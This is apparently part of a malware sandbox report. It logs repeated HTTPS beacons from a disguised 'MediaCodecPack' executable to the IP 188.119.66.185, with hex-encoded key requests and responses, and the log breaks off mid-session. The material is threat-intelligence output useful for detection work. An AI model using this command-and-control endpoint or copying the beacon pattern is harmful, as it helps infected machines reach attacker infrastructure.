                                                                                          Dec 18, 2024 21:10:05.250423908 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:05.250442982 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.252298117 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:05.252324104 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.953624964 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.953706980 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:05.953795910 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.102626085 CET49838443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.102650881 CET44349838188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:06.241050005 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.241080999 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:06.241149902 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.245394945 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:06.245405912 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:07.733021975 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:07.733129978 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:07.733553886 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:07.733560085 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:07.735692978 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:07.735697985 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478224993 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478300095 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:08.478317022 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478348017 CET44349845188.119.66.185192.168.2.8
                                                                                          Dec 18, 2024 21:10:08.478358984 CET49845443192.168.2.8188.119.66.185
                                                                                          Dec 18, 2024 21:10:08.478404999 CET49845443192.168.2.8188.119.66.185
                                                                                          • 188.119.66.185
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.849708188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:00 UTC283OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:01 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:01 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:01 UTC810INData Raw: 33 31 65 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 63 32 37 62 36 62 63 38 66 38 30 32 32 34 63 62 64 33 62 63 31 39 30 32 34 39 66 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 33 64 34 31 62 31 66 64 64 33 31 33 61 31 62 64 32 33 32 39 32 64 35 64 30 39 31 35 37 34 39 63 39 37 30 33 34 66 32 64 34 30 33 34 62 36 64 31 36 36 63 63 63 66 37 31 31 36 38 62 62 66 37 35 36 61 34 65 66 65 62 35 32 61 61 37 66 63 31 63 32 33 66 66 34 66 37 63 37 66 32 34 38 31 32 38 64 34 36 39 39 33 65 61 35 33 37
                                                                                          Data Ascii: 31e8b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc1c23ff4f7c7f248128d46993ea537


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.849711188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:06 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:07 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:07 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.849712188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:08 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:09 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:09 UTC666INData Raw: 32 38 65 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 62 36 63 33 35 65 34 65 38 35 37 65 61 61 65 34 30 64 64 38 36 62 31 63 62 33 32 37 66 64 33 66 34 35 32 63 35 39 64 66 32 34 39 63 39 64 30 39 39 34 62 61 64 62 32 66 31 64 66 30 61 30 37 63 65 64 63 30 34 31 65 64 65 33 33 32 66 31 65 64 62 32 65 38 64 64 30 64 33 38 61 35 66 34 61 63 62 36 65 33 37 66 39 64 37 30 35 35 35 36 66 31 30 37 39 63 63 66 34 31 63 36 38 62 66 66 30 34 31 61 61 65 66 66 35 35 33 61 63 37 33 63 63 63 62 32 31 66 35 66 33 63 64 65 34 34 38 30 65 38 64 35 38 39 38 32 30 61 65 33 32
                                                                                          Data Ascii: 28e8b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.849714188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:11 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:11 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:11 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:11 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.849715188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:13 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:14 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:14 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:14 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.849716188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:15 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:16 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:16 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.849718188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:18 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:19 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:18 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:19 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.849724188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:20 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:21 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:21 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.849730188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:23 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:23 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:23 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.849736188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:25 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:26 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:26 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.849742188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:27 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:28 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:28 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.849748188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:29 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:30 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:30 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.849753188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:32 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:32 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:32 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.849759188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:34 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:35 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:35 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.849765188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:36 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:37 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:37 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:37 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.849771188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:39 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:39 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:39 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:39 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.849778188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:41 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:42 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:42 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.849784188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:43 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:44 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:44 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.849790188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:46 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 20:09:46 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 20:09:46 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 20:09:46 UTC24INData Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: e8b723663ec13250


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.849796188.119.66.1854432216C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 20:09:48 UTC291OUTGET /ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058 HTTP/1.1
